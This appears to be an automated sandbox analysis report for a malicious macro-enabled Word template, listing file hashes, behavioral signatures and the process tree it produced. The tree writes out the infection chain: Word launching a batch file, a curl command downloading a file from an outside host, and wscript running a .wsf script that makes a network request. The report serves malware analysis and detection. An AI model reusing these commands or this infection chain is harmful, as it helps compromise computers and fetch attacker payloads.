Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
17-03-2023 10:19
Behavioral task
behavioral1
Sample
451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f.dotm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f.dotm
Resource
win10v2004-20230220-en
General
-
Target
451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f.dotm
-
Size
21KB
-
MD5
d382cc7f10fdaec150184941b68cf39e
-
SHA1
48246205890e1ad8b1d8ceb252f2f79ada5d5750
-
SHA256
451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f
-
SHA512
edecc7994edc895af26bb7615216316711ea887260b1108a8cc5fb9d747b1d4fb7d97940ebdc68d202aaf9a173686104627f660800ee73c532a2d14096e8c7ba
-
SSDEEP
384:tmtGJQNvuJgxw79kY9+zpfcKl2HnQSB6sx9B3dX:q+QhuJgx6k/52HQSBxx9X
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3376 3600 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 33 1928 wscript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
WINWORD.EXEWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings cmd.exe -
NTFS ADS 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File created C:\Users\Admin\AppData\Local\Temp\~WRD0004.tmp\:Zone.Identifier:$DATA WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
WINWORD.EXEWINWORD.EXEpid process 3600 WINWORD.EXE 3600 WINWORD.EXE 4868 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 28 IoCs
Processes:
WINWORD.EXEWINWORD.EXEpid process 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 3600 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE 4868 WINWORD.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 3600 wrote to memory of 3376 3600 WINWORD.EXE cmd.exe PID 3600 wrote to memory of 3376 3600 WINWORD.EXE cmd.exe PID 3376 wrote to memory of 2968 3376 cmd.exe mode.com PID 3376 wrote to memory of 2968 3376 cmd.exe mode.com PID 3376 wrote to memory of 2740 3376 cmd.exe curl.exe PID 3376 wrote to memory of 2740 3376 cmd.exe curl.exe PID 3376 wrote to memory of 4868 3376 cmd.exe WINWORD.EXE PID 3376 wrote to memory of 4868 3376 cmd.exe WINWORD.EXE PID 3376 wrote to memory of 1928 3376 cmd.exe wscript.exe PID 3376 wrote to memory of 1928 3376 cmd.exe wscript.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f.dotm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.bat2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mode.commode 15,13⤵
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Local\Temp\temp.docx" http://eum-it.co.kr/gnuboard4/bbs/img/upload/temp.docx3⤵
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\temp.docx" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.bat?.wsf"3⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-walFilesize
8KB
MD5233e91d650ffd99eccc7f8a742d79eb3
SHA10bbe6636a6a680b84d968b01d0a0ad2f4882c395
SHA2563e236b93ca038025e168d9ef4c574d29b9152d6b4dbf11b877ac7244544ef818
SHA5128dbe559d6ce90033fe1a3f4263f66ef9c8ed461a1a7b4bf5e76e762c8194461e27edc00b3324b953299b5cb7329d6a8d6c53e10db2b3e8c35282f4e89d173b63
-
C:\Users\Admin\AppData\Local\Temp\temp.docxFilesize
1KB
MD5467ff0b53d41344aa0fbed2df4b25582
SHA10c910f3303865ad0813d31253fe4e2f1b7dc5a03
SHA25615363ec11808c03d6b535861011059b30bd133128f22084b0308b72b59eb76f5
SHA512eb366f2cbd74c0d7b4bf9e4dbaf6bb5240982ab833966f2f4a0df0af3984da6b0fbdb9e50332451ba5f5015c5f16efe02d1ce87d1daf8fe7ed95cb1c6df3441e
-
C:\Users\Admin\AppData\Local\Temp\~WRD0004.tmpFilesize
28KB
MD51bc9ac73a2fc0e857c48c385489b6bb0
SHA15305c28e86e2c2e757c41a036aad93be76522268
SHA256294b5d83a673cfac8f8ccd8aeb2bca53f0dce48cc3152a7e92c8f23dc61562b9
SHA51255d18ce9cd148105a3b67f03bc91c1d90cdf2cfe8c2ec8c344db8cc7237e8620c41a1691ae9c68291d4e0f58e50ff1c918129000d30c4e5c4d786422651d3612
-
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.datFilesize
251B
MD531711792923ed8eab176838f4b8744c9
SHA108be0cd5967f3aa6828aa0ea71762488d94a240d
SHA256d046094fb9162cd9a31afca4324007f5acb95f64065a263949b366a4713061c1
SHA5122b6f566e7d7a8ec6f9a29ad246fa13a405128854748a40f36bc658b044f1b4f8acd1c42f16683fe702d7de3b409e57a6ce7aa00291d03147ef97cd6e9a6560eb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.batFilesize
393B
MD5799be50c3436086b45b9e9071243aa59
SHA1b3f67263e783ffd08fabcb0979ac983c4e1e11ed
SHA256e762f82693c8b83bac6903db41198429078d50413a319ddb7b3a056ff17e8c1f
SHA5121c554704f8627fd0ea7294422824527b495cd2dde1ec3a496befb00d3121e31ab1b836b56d81edd2d3c4ac5d2f46d7ebe794864b4be0f6740ac381fba8c54987
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.batFilesize
393B
MD5799be50c3436086b45b9e9071243aa59
SHA1b3f67263e783ffd08fabcb0979ac983c4e1e11ed
SHA256e762f82693c8b83bac6903db41198429078d50413a319ddb7b3a056ff17e8c1f
SHA5121c554704f8627fd0ea7294422824527b495cd2dde1ec3a496befb00d3121e31ab1b836b56d81edd2d3c4ac5d2f46d7ebe794864b4be0f6740ac381fba8c54987
-
memory/3600-136-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmpFilesize
64KB
-
memory/3600-139-0x00007FFB9A930000-0x00007FFB9A940000-memory.dmpFilesize
64KB
-
memory/3600-138-0x00007FFB9A930000-0x00007FFB9A940000-memory.dmpFilesize
64KB
-
memory/3600-137-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmpFilesize
64KB
-
memory/3600-133-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmpFilesize
64KB
-
memory/3600-135-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmpFilesize
64KB
-
memory/3600-134-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmpFilesize
64KB